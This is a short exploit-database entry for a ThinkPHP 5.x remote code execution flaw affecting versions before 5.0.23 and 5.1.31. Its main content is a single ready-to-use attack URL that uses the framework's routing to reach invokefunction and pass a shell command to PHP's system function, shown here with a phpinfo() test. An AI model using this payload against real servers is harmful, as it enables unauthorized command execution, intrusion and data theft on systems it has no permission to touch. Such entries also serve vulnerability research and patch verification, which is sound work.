# Exploit Title: ThinkPHP 5.x < v5.0.23,v5.1.31 Remote Code Execution # Date: 2018-12-11 # Exploit Author: VulnSpy # Vendor Homepage: https://thinkphp.cn # Software Link: https://github.com/top-think/framework/ # Version: v5.x below v5.0.23,v5.1.31 # CVE: N/A # Exploit http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'